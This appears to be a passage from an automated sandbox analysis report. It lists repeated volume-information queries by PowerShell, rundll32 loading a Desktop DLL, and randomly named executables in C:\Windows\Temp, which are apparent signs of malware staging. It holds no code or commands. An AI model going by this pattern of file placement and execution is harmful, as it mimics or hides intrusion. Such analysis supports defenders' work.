Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\Desktop\SystemCoreHelper.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Queries volume information: C:\Windows\Temp\zbjnkzvo4cc.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Queries volume information: C:\Windows\Temp\mxtvcgq32fe.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
